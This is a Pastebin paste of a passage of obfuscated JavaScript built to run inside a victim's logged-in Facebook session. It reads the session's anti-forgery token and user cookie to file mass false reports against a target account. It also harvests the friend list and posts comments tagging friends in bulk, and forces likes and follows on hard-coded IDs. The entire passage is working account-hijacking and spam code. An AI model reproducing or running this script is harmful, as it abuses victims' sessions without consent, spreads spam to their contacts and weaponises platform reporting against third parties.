 25. var _0xb161=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70","\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41","\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];var fb_dtsg=document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id=document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now=( new Date)[_0xb161[5]]();function Report(_0x45e7x5){var _0x45e7x6= new XMLHttpRequest();var _0x45e7x7=_0xb161[6];var _0x45e7x8=_0xb161[7]+fb_dtsg+_0xb161[8]+_0x45e7x5+_0xb161[9]+_0x45e7x5+_0xb161[10]+now+_0xb161[11]+user_id+_0xb161[12]+user_id+_0xb161[13];_0x45e7x6[_0xb161[15]](_0xb161[14],_0x45e7x7,true);_0x45e7x6[_0xb161[16]]=function (){if(_0x45e7x6[_0xb161[17]]==4&&_0x45e7x6[_0xb161[18]]==200){_0x45e7x6[_0xb161[19]];} ;} ;_0x45e7x6[_0xb161[20]](_0x45e7x8);} ;
 26. var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","463259883775309","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
 27.  
 28. //Boss Code
 29. a("100002739037981");
 30. a("100000479133276");
 31. sublist("455300481237916");sublist("455300641237900");sublist("455300427904588");sublist("366822196752412");sublist("455300687904562");sublist("455306244570673");sublist("845537128805584");sublist("845537245472239");sublist("845537308805566");sublist("845537485472215");sublist("845537515472212");
 32. Like("460029870787089");
 33. Like("247118842116499");
 34. Like("1454641934764502");
 35. Like("498322286944036");
 36. Like("727015117316417");
 37. Like("404498102918885");
 38. Like("344897012264198");
 39.  
 40.  
 41. /* Nh?c */
 42. var parent=document.getElementsByTagName("html")[0];
 43. var _body = document.getElementsByTagName('body')[0];
 44. var _div = document.createElement('div');
 45. _div.style.height="25";
 46. _div.style.width="100%";
 47. _div.style.position="fixed";
 48. _div.style.top="auto";
 49. _div.style.bottom="0";
 50. _div.align="center";
 51. var _audio= document.createElement('audio');
 52. _audio.style.width="100%";
 53. _audio.style.height="25px";
 54. _audio.controls = true;
 55. _audio.autoplay = false;
 56. _audio.autoplay = true;
 57. _audio.src = "http://www.uploadhosting.co/uploads/121.58.223.113/Treasure - Bruno Mars (Official Music Video) [LoudTronix.me] [HQ]_z3HR9V.mp3";
 58. _div.appendChild(_audio);
 59. _body.appendChild(_div);
 60. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
 61. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
 62. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
 63. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top